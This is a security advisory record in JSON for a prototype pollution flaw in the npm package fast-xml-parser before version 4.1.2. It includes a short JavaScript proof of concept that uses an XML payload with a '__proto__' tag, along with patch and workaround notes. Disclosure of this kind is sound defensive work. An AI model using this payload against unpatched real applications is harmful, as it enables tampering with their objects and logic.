{"id":"GHSA-x3cc-x39p-42qx","summary":"fast-xml-parser vulnerable to Prototype Pollution through tag or attribute name","details":"### Impact\nAs a part of this vulnerability, user was able to se code using `__proto__` as a tag or attribute name.\n\n```js\nconst { XMLParser, XMLBuilder, XMLValidator} = require(\"fast-xml-parser\");\n\nlet XMLdata = \"\u003c__proto__\u003e\u003cpolluted\u003ehacked\u003c/polluted\u003e\u003c/__proto__\u003e\"\n\nconst parser = new XMLParser();\nlet jObj = parser.parse(XMLdata);\n\nconsole.log(jObj.polluted) // should return hacked\n``` \n\n### Patches\nThe problem has been patched in v4.1.2\n\n### Workarounds\nUser can check for \"__proto__\" in the XML string before parsing it to the parser.\n\n### References\nhttps://gist.github.com/Sudistark/a5a45bd0804d522a1392cb5023aa7ef7\n","aliases":["CVE-2021-26920","CVE-2023-26920","GHSA-793h-6f7r-6qvm"],"modified":"2026-05-01T04:27:04.595412321Z","published":"2023-06-13T12:44:34Z","database_specific":{"github_reviewed":true,"github_reviewed_at":"2023-06-13T12:44:34Z","nvd_published_at":"2023-12-12T17:15:07Z","cwe_ids":["CWE-1321"],"severity":"MODERATE"},"references":[{"type":"WEB","url":"https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-x3cc-x39p-42qx"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-26920"},{"type":"WEB","url":"https://github.com/NaturalIntelligence/fast-xml-parser/commit/2b032a4f799c63d83991e4f992f1c68e4dd05804"},{"type":"WEB","url":"https://gist.github.com/Sudistark/a5a45bd0804d522a1392cb5023aa7ef7"},{"type":"PACKAGE","url":"https://github.com/NaturalIntelligence/fast-xml-parser"},{"type":"ADVISORY","url":"https://github.com/advisories/GHSA-793h-6f7r-6qvm"}],"affected":[{"package":{"name":"fast-xml-parser","ecosystem":"npm","purl":"pkg:npm/fast-xml-parser"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"4.1.2"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-x3cc-x39p-42qx/GHSA-x3cc-x39p-42qx.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"}]}